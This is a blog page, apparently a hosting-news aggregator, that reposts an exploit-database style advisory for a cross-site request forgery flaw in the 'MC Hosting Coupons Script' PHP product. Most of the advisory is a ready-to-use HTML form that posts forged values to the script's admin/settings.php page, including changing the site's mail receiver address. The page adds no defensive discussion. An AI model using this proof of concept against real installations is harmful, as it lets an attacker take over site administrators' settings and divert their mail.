Popular Posts
-
US 01:36 15.04.2016Get short URL Marco Marsala seemingly lost all traces of his company, including the websites that he works with, b...
-
If you're a beginner just starting a WordPress blog, then there's no need to get VPS hosting. A shared hosting plan will provide a...
-
BI Intelligence See Also The Internet of Everything — $12.6 trillion ROI expected over the next decade [SLIDE DECK] T...
-
2017-08-22 Sports News of Tue, 22 Aug 20170 Tamale ready to host 2017 MTN FA Cup final - RFA Chairman File photo Mr. Abdoula...
-
June 02, 2016 -- Miami, Florida (PRWEB) June 02, 2016 Dedicated hosting provider ReliableSite is an early sponsor of free ...
-
CHICAGO, June 20, 2016 /PRNewswire/ -- Paper Source, a Chicago-based specialty retailer and web store, will be hosting a warehouse sale o...
-
Generally, business owners tend to believe that their website is being backed up, that it is actively maintained by their hosting service,...
-
July 17, 2017 by Sajal Chakraborty Learn about Amazon S3 (Simple Storage Service), creating a bucket in AWS S3 and then hosting stat...
-
LANSING, Mich., Aug. 20, 2015 /PRNewswire/ -- Liquid Web, Inc., (www.liquidweb.com) a leading provider of professional web hosting and man...
-
The Blogging Tips welcome all webmasters to participate in its campaign of submitting genuine web hosting reviews, where the final winner ...
Blog Archive
- December (19)
- November (25)
- October (28)
- September (26)
- August (28)
- July (31)
- June (26)
- May (27)
- April (28)
- March (30)
- February (28)
- January (31)
- December (31)
- November (30)
- October (31)
- September (29)
- August (44)
- July (56)
- June (53)
- May (54)
- April (48)
- March (55)
- February (44)
- January (3)
- December (5)
- November (5)
- October (26)
- September (25)
- August (29)
- July (26)
- June (18)
- September (1)
About Me
Powered by Blogger.
Total Pageviews
81,500
Sunday, January 15, 2017
MC Hosting Coupons Script - Cross-Site Request Forgery
# # # # # # Vulnerability: Cross-Site Request Forgery # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Hosting Coupons Script # Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881 # Author: İhsan Şencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Other features have the same security vulnerability. # Exploit: <html> <body> <form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form"> <label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br> <input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br> <label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br> <input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords" placeholder="Write website keywords..." /><br> <label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br> <input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br> <label for="website_desc" class="control-label col-lg-4">Website Description</label><br> <textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br> <input type="submit" name="sub" value="Submit" class="btn btn-primary" /> </form> </body> </html> # # # # #
Source: MC Hosting Coupons Script - Cross-Site Request Forgery
Source: MC Hosting Coupons Script - Cross-Site Request Forgery
Subscribe to:
Post Comments
(Atom)
0 comments:
Post a Comment